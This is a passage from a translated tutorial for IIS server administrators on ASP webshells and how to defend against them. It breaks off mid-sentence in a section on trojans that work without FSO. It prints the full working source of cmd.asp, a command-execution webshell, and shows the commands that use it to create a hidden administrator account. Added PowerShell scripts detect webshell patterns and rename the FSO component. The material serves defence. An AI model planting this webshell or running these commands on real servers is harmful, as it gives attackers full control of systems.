The attack and defense methods described here are simple: anyone who knows how to build web pages and has some familiarity with CMD commands can follow them. In my view there is not much technical skill involved, and the difficulty is elementary. The tutorial is written for web server administrators, whether you have years of server management experience or are a new user, as a reference for the most effective defenses against webshell attacks and overflow attacks.
I. Basic ASP webshell attacks and prevention
The following describes three ASP webshell attack methods and how to prevent them (with the webshell source code where it can be given):
Example 1: a script that binds CMD commands
This is an attack that uses a script to bind CMD commands. It is not the only kind of ASP webshell; two more kinds, and how to defend against them, are introduced later. Once an attacker places this webshell on your server and you have no proper defense in place, your server becomes a zombie. The servers affected are generally those of virtual host providers and those belonging to individuals or companies.
How does the attacker get this webshell onto your server? On a virtual host provider's web space it is generally brought in by one of the provider's own customers ^_^, because a hosting customer already has permission to upload files and already has an HTTP address for the space. The purpose of such a webshell is usually to see what files are stored in the rented space, or to steal important information from the server through it. On an individual's or company's server, the webshell is usually uploaded through a script vulnerability on the server, such as a forum or a download system, which allows a file to be uploaded over port 80 on the web server, or the TFTP service is used to transfer the webshell. Since this article only explains how these webshells attack, we do not describe how to transfer them to the server. We assume that you have already placed the webshell in the web space and obtained an HTTP address for it. As long as the server supports ASP, this webshell can be used to gain administrative control of the server system.
This backdoor is very hard to notice: even if you reinstall the system N times and apply N patches, it makes no difference, because the hole is not one that a patch closes ^_^. As long as the webshell still exists and the attacker finds its web address, your server becomes a zombie, which is extremely harmful.
As shown in the figure: I named the ASP webshell file cmd.asp and uploaded it to a server with the IP address 192.168.0.18. Once the file is stored in the webshell folder under the FTP root directory, we can reach it at http://192.168.0.18/webshell/cmd.asp. Any CMD command can be typed into the blank form, for example dir c:. To create an administrator account on this server, enter two commands in turn: first net user netpk hacker /add, then click the "execute CMD command" button, which creates the ordinary user netpk; then net localgroup administrators netpk /add, which adds netpk to the administrators group. This shows that the webshell can execute arbitrary CMD commands. (Strictly, the commands run with the privileges of the account the ASP application runs under; on the IIS configuration assumed here that was enough to create an administrator, whereas with a properly restricted application pool identity the net user ... /add step would fail.) What you do from there I don't need to teach you.
The source code of the cmd.asp script is attached below:
<%
Dim oScript
Dim oScriptNet
Dim oFileSys, oFile
Dim szCMD, szTempFile
szCMD = Request.Form(".cmd")
' Get the command from the input box.
On Error Resume Next
' If an error occurs, skip that step so that no error page is returned.
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
' Create a WshShell object.
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
szTempFile = "C:\" & oFileSys.GetTempName()
' GetTempName() is the FSO method that generates a temporary file name.
Call oScript.Run("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
' Call WshShell.Run to execute the command and redirect its output to the temporary file.
Set oFile = oFileSys.OpenTextFile(szTempFile, 1, False, 0)
' Open the temporary file for reading.
%>
<HTML>
<BODY bgcolor="#C0C0C0" text="#000000">
<FORM action="<%= Request.ServerVariables("URL") %>" method="POST">
<INPUT type=text name=".CMD" size=45 value="<%= szCMD %>">
<INPUT type=submit value="execute CMD command" class=input>
</FORM>
<PRE>
<%
On Error Resume Next
Response.Write Server.HTMLEncode(oFile.ReadAll)
' Output the HTML-encoded file contents.
oFile.Close
' Close the file.
Call oFileSys.DeleteFile(szTempFile, True)
' Delete the temporary file so it is not left behind as evidence.
%>
</PRE>
</BODY>
</HTML>
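Since the webshell remains a hole for as long as the file exists, the first thing an administrator wants is a way to find files like cmd.asp in the web root. The following PowerShell script is an added example, not code from the original article or from any webshell author: it walks a web root, looks for the building blocks a CMD-binding webshell needs (a WScript.Shell or Shell.Application object, FSO, a cmd.exe /c string, user input read from the request, or an Eval/Execute on request data) and reports files that combine at least two of them. The web root path, the extension list and the patterns are assumptions chosen for illustration.

```powershell
# Added example, not code from the original article: scan an IIS web root for
# ASP files that carry the building blocks of a CMD-binding webshell such as
# cmd.asp above. The web root path, the extension list and the patterns are
# assumptions chosen for illustration.

function Find-SuspiciousAsp {
    param(
        [Parameter(Mandatory)] [string] $WebRoot,
        # Extensions that classic IIS maps to the ASP engine; .asa, .cer and .cdx
        # are easy to miss when only *.asp is searched.
        [string[]] $Extensions = @('*.asp', '*.asa', '*.cer', '*.cdx')
    )
    # One pattern per capability a webshell needs. A file matching several of
    # them is far more suspicious than a single hit, so we require at least two.
    $patterns = [ordered]@{
        shell  = 'WScript\.Shell|Shell\.Application'
        fso    = 'Scripting\.FileSystemObject'
        cmdexe = 'cmd(\.exe)?\s+/c'
        input  = 'Request\.(Form|QueryString)'
        eval   = '\b(Eval|Execute|ExecuteGlobal)\s*\(?\s*Request\b'   # one-line backdoors
    }
    Get-ChildItem -Path $WebRoot -Recurse -File -Include $Extensions -ErrorAction SilentlyContinue |
        ForEach-Object {
            $file = $_
            $hits = @(foreach ($name in $patterns.Keys) {
                $m = Select-String -Path $file.FullName -Pattern $patterns[$name] -AllMatches
                if ($m) { [pscustomobject]@{ Capability = $name; Lines = ($m.LineNumber -join ',') } }
            })
            if ($hits.Count -ge 2) {
                [pscustomobject]@{
                    Path         = $file.FullName
                    LastWriteUtc = $file.LastWriteTimeUtc      # compare with the site's deploy dates
                    SHA256       = (Get-FileHash -Path $file.FullName -Algorithm SHA256).Hash
                    Capabilities = ($hits | ForEach-Object { "$($_.Capability)@$($_.Lines)" }) -join ' '
                }
            }
        }
}

# Constructed sample so the script runs stand-alone: a stripped-down copy of the
# WScript.Shell + FSO pattern from cmd.asp next to a harmless page, written to a
# throwaway web root under the temp directory.
$demoRoot = Join-Path ([System.IO.Path]::GetTempPath()) 'webroot-demo'
New-Item -ItemType Directory -Path (Join-Path $demoRoot 'webshell') -Force | Out-Null
@'
<% szCMD = Request.Form(".cmd")
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
Call oScript.Run("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True) %>
'@ | Set-Content -Path (Join-Path $demoRoot 'webshell\cmd.asp')
'<% Response.Write "hello" %>' | Set-Content -Path (Join-Path $demoRoot 'default.asp')

Find-SuspiciousAsp -WebRoot $demoRoot | Format-List
```

On the constructed sample the scan reports only webshell\cmd.asp, with the shell, fso, cmdexe and input capabilities and their line numbers, while default.asp is not listed. Run it against the real web root with -WebRoot C:\Inetpub\wwwroot (or wherever the site lives) and check any hit's LastWriteUtc and hash against what you actually deployed; a legitimate management page may also use FSO, so the report is a triage list, not a verdict.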
Just write the code above in Notepad, save it with the .asp extension, upload it to your web space and run it.
There are several ways to prevent scripts that bind CMD commands. The simplest is to remove the FSO (Scripting.FileSystemObject) component from ASP. To unregister FSO, enter the following at the CMD prompt:
regsvr32 /u c:\winnt\system32\scrrun.dll
Note: change the path to the actual system directory of your installation. Note also that the dangerous component in cmd.asp is WScript.Shell (wshom.ocx), not FSO; FSO is only used to read the output file, so a variant that reads the command output through WshShell.Exec is not stopped by this step alone.
Moreover, this method goes too far. Once scrrun.dll is unregistered, nobody, including the site administrator, can use FileSystemObject (or Scripting.Dictionary, which lives in the same DLL). That is not what an administrator wants, because this object is very convenient for web-based site management, and losing it costs more than it saves. Yet leaving such a dangerous object available creates a security hole on your website. Is there a better solution? Yes. The method is as follows:
We can prevent others from using FileSystemObject illegitimately while still being able to use it ourselves.
The method is as follows:
Open the registry editor and find the key
HKEY_CLASSES_ROOT\Scripting.FileSystemObject
Rename it to a string of your choosing (right-click, then "Rename"), for example
HKEY_CLASSES_ROOT\Scripting.FileSystemObject2
After this, the object must be referenced in ASP as
Set fso = CreateObject("Scripting.FileSystemObject2")
and the usual call
Set fso = CreateObject("Scripting.FileSystemObject")
no longer works: anyone who calls FileSystemObject in the usual way finds it unavailable.
As long as you do not tell anyone the modified name, nobody else can use FileSystemObject, while you as site manager can still use it for online site management and other functions. Bear in mind what this actually does: only the ProgID name is changed, the component itself stays registered under its CLSID (listed in the CLSID subkey of the renamed key), so this is a hiding measure rather than a removal, and re-registering scrrun.dll recreates the original key.
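The rename is usually done by hand in the registry editor as described above. The script below is an added example, not code from the original article: it performs the same rename from PowerShell and then checks three ways of creating the object, so you can see exactly what the measure blocks and what it leaves open. It assumes the new name Scripting.FileSystemObject2 used in the text and an elevated session on a test machine, because it edits HKLM\SOFTWARE\Classes.

```powershell
# Added example, not code from the original article: carry out the ProgID rename
# described above from PowerShell and then check what it does and does not block.
# Assumptions: the new name Scripting.FileSystemObject2 (as in the text) and an
# elevated session on a test machine, since this edits HKLM\SOFTWARE\Classes.

$OldProgId = 'Scripting.FileSystemObject'
$NewProgId = 'Scripting.FileSystemObject2'   # choose a name nobody will guess
$Classes   = 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Classes'   # machine-wide half of HKCR

function Rename-FsoProgId {
    $old = "$Classes\$OldProgId"
    if (-not (Test-Path $old)) { throw "ProgID key $OldProgId not found (already renamed?)" }
    # Read the CLSID before renaming: it is the component's real identity and
    # the rename does not change it.
    $clsid = (Get-ItemProperty -Path "$old\CLSID").'(default)'
    Rename-Item -Path $old -NewName $NewProgId
    return $clsid
}

function Test-FsoActivation {
    param([Parameter(Mandatory)] [string] $Clsid)
    $result = [ordered]@{}
    # 1. Activation by the old ProgID, which is what cmd.asp and the Haiyang
    #    trojan do. Should now fail.
    try   { $null = New-Object -ComObject $OldProgId -ErrorAction Stop; $result['OldProgId'] = 'allowed' }
    catch { $result['OldProgId'] = 'blocked' }
    # 2. Activation by the new ProgID: the administrator's private name.
    try   { $null = New-Object -ComObject $NewProgId -ErrorAction Stop; $result['NewProgId'] = 'allowed' }
    catch { $result['NewProgId'] = 'blocked' }
    # 3. Activation by CLSID. The rename leaves HKCR\CLSID untouched, so anyone
    #    who knows the CLSID can still create the object (in ASP for instance via
    #    <OBJECT RUNAT=Server CLASSID="clsid:..."> or GetObject("new:{...}")).
    try {
        $null = [Activator]::CreateInstance([Type]::GetTypeFromCLSID([Guid]$Clsid))
        $result['Clsid'] = 'allowed'
    } catch { $result['Clsid'] = 'blocked' }
    [pscustomobject]$result
}

$clsid = Rename-FsoProgId
Test-FsoActivation -Clsid $clsid
```

After the rename the check reports OldProgId blocked, NewProgId allowed and Clsid allowed. The last line is the caveat a practitioner should keep in mind: the measure defeats webshells that hard-code the usual ProgID, which is all of the ones discussed here, but not an attacker who activates the component by CLSID. Also re-run the check after patching, because registering scrrun.dll again (for example by a Windows update or a stray regsvr32 scrrun.dll) recreates the original ProgID key.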
Even so, this configuration is not perfect. It only solves the problem of FSO-based CMD calls and some simple ASP trojan scripts. Webshells are not limited to ASP: CGI, PHP and JSP all have their own, and if your server supports CGI, PHP and JSP at the same time you are in trouble, because those webshells do not need FSO at all. So read on; there are other webshells worth your attention.
In fact there is an even simpler and more practical way to prevent the webshell that binds CMD commands through an ASP script, one that takes only 30 seconds to configure. After introducing the CGI, PHP, JSP and other webshells, we will present a single defense that is effective against every webshell mentioned here that can bind CMD commands, and against overflow attacks.
Example 2: file-management webshells that use FSO, and how to prevent them
The following describes the Haiyang Top ASP trojan. Through a web page this webshell can modify, edit, delete, move, upload and download any file on the server; once an attacker uploads it to your server, every file on the server is under their control. What can the attacker then do? Exactly what was mentioned above: change, delete, move ......
As shown in the figure: once you see this screen, you can imagine what eventually happens to your server. Nothing on it remains private; defacing the home page or deleting files is a matter of a few clicks. This type of ASP trojan can be downloaded from various hacker websites, so its source code is not reproduced here.
Defense: the same as in Example 1, not repeated here.
Postscript: Is defending against ASP webshells really just a matter of disabling FSO or renaming it in the registry? No, because there is another kind of ASP trojan that needs no FSO support. It is not very powerful, but its functions are sufficient for breaking into a website, and such trojans are difficult to defend against. See Example 3.
Example 3: ASP trojans that work without FSO
Because this kind of ASP trojan has no FSO support, its functions are of course not very powerful: it can only browse the directories on the server, copy and move files, and execute program files at a specified path. It is worth noting that most of the current virtual host providers still have this